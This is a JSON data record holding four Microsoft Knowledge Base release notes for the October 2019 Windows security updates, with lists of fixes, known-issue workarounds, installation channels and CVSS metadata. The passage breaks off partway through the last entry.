{"mskb": [{"lastseen": "2019-10-17T22:37:55", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4519338, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Note\u00a0</strong>Follow <a href=\"https://twitter.com/windowsupdate\" rel=\"noreferrer noopener\" tabindex=\"-1\" target=\"_blank\" title=\"https://twitter.com/windowsupdate\">@WindowsUpdate</a> to find out when new content is published to the release information dashboard.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>Starting with update KB4497934, we are introducing functionality that allows you to decide when to install a feature update. You control when you get a feature update while simultaneously keeping your devices up to date. Feature updates that are available for eligible devices will appear in a separate module on the Windows Update page (<strong>Settings </strong>> <strong>Update & Security</strong> > <strong>Windows Update</strong>). If you would like to get an available update right away, select <strong>Download and install now</strong>. To find out more about this feature, please go to this <a href=\"https://blogs.windows.com/windowsexperience/?p=172316\" managed-link=\"\" target=\"_blank\">blog</a>.\u00a0</p><p><em><span>When Windows 10 devices are at, or within several months of reaching, end of service, Windows Update will begin to automatically initiate a feature update. This keeps those devices supported and receiving the monthly updates that are critical to device security and ecosystem health.</span></em></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span><strong>Note </strong>This release also contains updates for Microsoft HoloLens (OS Build 17763.806) released October 8, 2019.\u00a0</span>Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">ePub support ending in Microsoft Edge</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft Edge will end support for e-books that use the .epub file extension over the next several months. For more information, see <a href=\"https://support.microsoft.com/help/4517840\" managed-link=\"\" target=\"_blank\">Download an ePub app to keep reading e-books</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a href=\"https://support.microsoft.com/en-us/help/824684/description-of-the-standard-terminology-that-is-used-to-describe-micro\" managed-link=\"\" target=\"_blank\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li>Updates to improve security when using Internet Explorer and Microsoft Edge.</li><li>Updates for verifying user names and passwords.</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue in the Keyboard Lockdown Subsystem that may not filter key input correctly.</li><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Addresses an issue with applications and printer drivers that utilize the Windows JavaScript engine (<strong>jscript.dll</strong>) for processing print jobs.</li><li>Security updates to Windows Shell, Internet Explorer, Microsoft Scripting Engine, Microsoft Edge, Windows App Platform and Frameworks, Windows Cryptography, Windows Authentication, Windows Kernel, and Windows Server.</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p><span><span><span><span>For more information about the resolved security vulnerabilities, please refer to the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</span></span></span></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Windows Update Improvements</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.</p></div></div></div></div></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr><tr><td>After installing <a data-content-id=\"4493509\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"\">KB4493509</a>, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"</td><td><ol><li>Uninstall and reinstall any recently added language packs. For instructions, see <a data-content-id=\"4496404\" data-content-type=\"article\" href=\"\" managed-link=\"\">Manage the input and display language settings in Windows 10</a>.</li><li>Select\u00a0<strong>Check for Updates</strong> and install the April 2019 Cumulative Update. For instructions, see <a data-content-id=\"4027667\" data-content-type=\"ia\" href=\"\" managed-link=\"\">Update Windows 10</a>.</li></ol><p><strong>Note</strong> If reinstalling the language pack does not mitigate the issue, reset your PC as follows:</p><ol><li>Go to the <strong>Settings </strong>app > <strong>Recovery</strong>.</li><li>Select <strong>Get Started</strong> under the <strong>Reset this PC</strong> recovery option.</li><li>Select <strong>Keep my Files</strong>.</li></ol><p>Microsoft is working on a resolution and will provide an update in an upcoming release.</p></td></tr><tr><td>We are investigating reports that a small number of devices may startup to a black screen during the first logon after installing updates.</td><td><p>This issue is resolved in <a data-content-id=\"4520062\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4520062</a>.</p></td></tr><tr><td>After installing this update, Windows Mixed Reality Portal users may intermittently receive a \u201c15-5\u201d error code. In some cases, Windows Mixed Reality Portal may report that the headset is sleeping and pressing \u201cWake up\u201d may appear to produce no action.</td><td><p>To mitigate the issue, use the following steps:</p><ol><li>Close the Windows Mixed Reality Portal, if it is running.</li><li>Open Task Manager by selecting the <strong>Start </strong>button and typing \u201ctask manager<strong>\u201d</strong>.</li><li>In Task Manager, under the <strong>Processes </strong>tab, right-click <strong>Windows Explorer</strong> and select <strong>Restart</strong>.</li><li>Open the Windows Mixed Reality Portal.</li></ol><p>We are working on a resolution and will provide an update in an upcoming release.</p></td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For more information, see\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU (<a data-content-id=\"4521862\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4521862</a>) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the <a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>.</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4519338\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/3/3/b/33b30449-561b-451a-9989-55b003b3abec/KB4519338_V1.013.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4519338</a>.\u00a0</p></body></html>", "modified": "2019-10-15T18:09:14", "id": "KB4519338", "href": "https://support.microsoft.com/en-us/help/4519338/", "published": "2019-10-15T18:08:46", "title": "October 8, 2019\u2014KB4519338 (OS Build 17763.805)", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-17T22:36:54", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4520008, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>The Windows 10 April 2018 Update will reach end of service on November 12, 2019 for Home and Pro editions. We will begin updating devices running the <span>Windows 10</span> April 2018 Update <span><span>starting July 16, 2019</span></span> to help ensure that these devices <span>remain</span> in a serviced <span>and</span> secure state. For more information, see the Windows 10, version 1903 section of\u00a0the <a data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/en-us/windows/release-information/status-windows-10-1903\" managed-link=\"\" target=\"_blank\">release information dashboard</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Note\u00a0</strong>Follow <a href=\"https://twitter.com/windowsupdate\" rel=\"noreferrer noopener\" tabindex=\"-1\" target=\"_blank\" title=\"https://twitter.com/windowsupdate\">@WindowsUpdate</a> to find out when new content is published to the release information dashboard.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>Reminder\u00a0</strong>March 12\u00a0and April 9\u00a0were the last two Delta updates for Windows 10, version\u00a01803. Security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please visit our <a href=\"https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426\" managed-link=\"\" target=\"_blank\">blog</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>Starting with update KB4499183, we are introducing functionality that allows you to decide when to install a feature update. You control when you get a feature update while simultaneously keeping your devices up to date. Feature updates that are available for eligible devices will appear in a separate module on the Windows Update page (<strong>Settings </strong>> <strong>Update & Security</strong> > <strong>Windows Update</strong>). If you would like to get an available update right away, select <strong>Download and install now</strong>. To find out more about this feature, please go to this <a href=\"https://blogs.windows.com/windowsexperience/?p=172316\" managed-link=\"\" target=\"_blank\">blog</a>.\u00a0</p><p><em>When Windows 10 devices are at, or within several months of reaching, end of service, Windows Update will begin to automatically initiate a feature update. This keeps those devices supported and receiving the monthly updates that are critical to device security and ecosystem health.</em></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">ePub support ending in Microsoft Edge</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft Edge will end support for e-books that use the .epub file extension over the next several months. For more information, see <a href=\"https://support.microsoft.com/help/4517840\" managed-link=\"\" target=\"_blank\">Download an ePub app to keep reading e-books</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a href=\"https://support.microsoft.com/en-us/help/824684/description-of-the-standard-terminology-that-is-used-to-describe-micro\" managed-link=\"\" target=\"_blank\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li>Updates to improve security when using Internet Explorer and Microsoft Edge.</li><li>Updates for verifying user names and passwords.</li><li>Updates for\u00a0storing and managing files.</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue in the Keyboard Lockdown Subsystem that may not filter key input correctly.\u00a0</li><li>Addresses an issue with the Bluetooth hardening updates, released August 13, 2019, that may cause a\u00a0\"<span><span><span>0x133 DPC_WATCHDOG_VIOLATION\" error.</span></span></span></li><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Addresses an issue with applications and printer drivers that utilize the Windows JavaScript engine (<strong>jscript.dll</strong>) for processing print jobs.</li><li>Security updates to Windows Shell, Internet Explorer, Microsoft Edge, Windows App Platform and Frameworks, Windows Cryptography, Windows Authentication, Windows Datacenter Networking , Windows Storage and Filesystems, Windows Kernel, Microsoft Scripting Engine, and Windows Server.</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr><tr><td>We are investigating reports that a small number of devices may startup to a black screen during the first logon after installing updates.</td><td><p>This issue is resolved in <a data-content-id=\"4519978\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4519978</a>.</p></td></tr><tr><td>After installing this update, Windows Mixed Reality Portal users may intermittently receive a \u201c15-5\u201d error code. In some cases, Windows Mixed Reality Portal may report that the headset is sleeping and pressing \u201cWake up\u201d may appear to produce no action.</td><td><p>To mitigate the issue, use the following steps:</p><ol><li>Close the Windows Mixed Reality Portal, if it is running.</li><li>Open Task Manager by selecting the <strong>Start </strong>button and typing \u201ctask manager<strong>\u201d</strong>.</li><li>In Task Manager, under the <strong>Processes </strong>tab, right-click <strong>Windows Explorer</strong> and select <strong>Restart</strong>.</li><li>Open the Windows Mixed Reality Portal.</li></ol><p>We are working on a resolution and will provide an update in an upcoming release.</p></td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes.\u00a0For more information, see\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU\u00a0(<a data-content-id=\"4521861\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4521861</a>) will be offered to you automatically.\u00a0To get the standalone package for the latest\u00a0SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>.\u00a0</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4520008\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/d/c/5/dc5329be-7583-4fb4-bba3-5c2449776112/KB4520008_V1.009.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4520008</a>.\u00a0</p></body></html>", "modified": "2019-10-15T17:38:34", "id": "KB4520008", "href": "https://support.microsoft.com/en-us/help/4520008/", "published": "2019-10-15T17:38:19", "title": "October 8, 2019\u2014KB4520008 (OS Build 17134.1069)", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-17T22:47:25", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4520003, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>IMPORTANT </strong>Verify that<strong> </strong>you have installed the required updates listed in the <strong>How to get this update</strong> section <u>before</u> installing this update.\u00a0</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p class=\"CxSpFirst\"><strong><span>IMPORTANT</span></strong><span> Customers who have <a href=\"https://www.microsoft.com/en-us/cloud-platform/extended-security-updates\" managed-link=\"\" target=\"_blank\">purchased</a> the Extended Security Update (ESU) for</span> on-premises versions of some operating systems must follow specific procedures to continue receiving security updates after extended support ends on January 14, 2020. For more information, see <a data-content-id=\"4522133\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4522133</a>.</p></div></div></div></div><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Security updates to Windows Authentication, Microsoft JET Database Engine, Windows Kernel, Internet Information Services, and Windows Server.</li></ul><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p></div><h2>Known issues in this update</h2><div><p>Microsoft is not currently aware of any issues with this update.</p></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p><strong>Prerequisite:</strong></p><p>You must install\u00a0the updates listed below and <strong><u>restart your device</u></strong> before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup.</p><ol><li>The\u00a0March 12, 2019 servicing stack update (SSU) (<a data-content-id=\"4490628\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"\">KB4490628</a>).\u00a0If you are using Windows Update, this SSU\u00a0will be offered to you automatically.\u00a0To get the standalone package for this SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>.\u00a0</li><li>The latest SHA-2 update (<a data-content-id=\"4474419\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4474419</a>) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. For more information on SHA-2 updates, see <a data-content-id=\"4472027\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">2019 SHA-2 Code Signing Support requirement for Windows and WSUS</a>.</li><li>The <u>latest </u>SSU\u00a0(<a data-content-id=\"4516655\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4516655</a>).\u00a0If you are using Windows Update, the latest SSU\u00a0will be offered to you automatically.\u00a0To get the standalone package for the latest\u00a0SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>.\u00a0</li></ol><p>\u00a0</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">No</td><td>See the other options below.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4520003\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>:\u00a0\u00a0Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/2/5/2/2523d5a5-db56-462b-9e0f-3dc39145fac7/KB4520003_V1.007.csv\" managed-link=\"\" target=\"_blank\">file information for update 4520003</a>.\u00a0</p></body></html>", "modified": "2019-10-09T20:05:54", "id": "KB4520003", "href": "https://support.microsoft.com/en-us/help/4520003/", "published": "2019-10-09T20:05:38", "title": "October 8, 2019\u2014KB4520003 (Security-only update)", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-10T22:50:20", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4520011, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p>For more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following <a data-content-id=\"824684\" data-content-type=\"article\" href=\"\" managed-link=\"\">article</a>.</p></div></div></div></div><h2>Highlights</h2><ul><li>Updates to improve security when using Internet Explorer and Microsoft Edge.</li><li>Updates for verifying user names and passwords.</li><li>Updates for\u00a0storing and managing files.</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue that prevents\u00a0<strong>netdom.exe</strong> from displaying the new ticket-granting ticket (TGT) delegation bit for the display or query mode.</li><li>Addresses an issue in security bulletin CVE-2019-1318 that may cause client or server computers that don\u2019t support <a href=\"https://tools.ietf.org/html/rfc7627\" managed-link=\"\" target=\"_blank\">Extended Master Secret (EMS) RFC 7627</a> to have increased connection latency and CPU utilization. This issue occurs while performing full Transport Layer Security (TLS) handshakes from devices that don\u2019t support EMS, especially on servers. EMS support has been available for all the supported versions of Windows since calendar year 2015 and is being incrementally enforced by the installation of the October 8, 2019 and later monthly updates.</li><li>Provides protections against a new subclass of speculative execution side-channel vulnerabilities, known as <em><span><span>Microarchitectural Data Sampling</span></span></em>, for 32-Bit (x86) versions of Windows (<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2019-11091</a>,<a href=\"https://nam06.safelinks.protection.outlook.com/?url=https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv190013&data=02%7c01%7cv-shros%40microsoft.com%7c09be709d4f5a48828b3608d731b5e011%7c72f988bf86f141af91ab2d7cd011db47%7c1%7c0%7c637032529545445662&sdata=fvFdb13Krl8nAuUPxE9ZigyGg3qICkRND%2BcRcoc9WXI%3D&reserved=0\"> </a><a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2018-12126</a>, <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2018-12127</a>, <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2018-12130</a>). Use the registry settings as described in the <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in\" managed-link=\"\" target=\"_blank\">Windows Client</a> article<em><span><span>. </span></span></em>(These registry settings are enabled by default for Windows Client OS editions.)</li><li>Addresses an issue with applications and printer drivers that utilize the Windows JavaScript engine (<strong>jscript.dll</strong>) for processing print jobs.</li><li>Security updates to Internet Explorer, Microsoft Edge, Microsoft Scripting Engine, Windows Cryptography, Windows Authentication, Windows Storage and Filesystems, Windows Kernel, and Windows Server.</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Windows Update Improvements</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.</p></div></div></div></div></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends that you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes.\u00a0For more information, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU (<a data-content-id=\"4521856\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4521856</a>) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the <a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>.</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4520011\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically synchronize with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/b/6/1b61e07f-b61c-4c5d-a9eb-3ae896000aee/KB4520011_V1.010.csv\" managed-link=\"\" target=\"_blank\">file information for 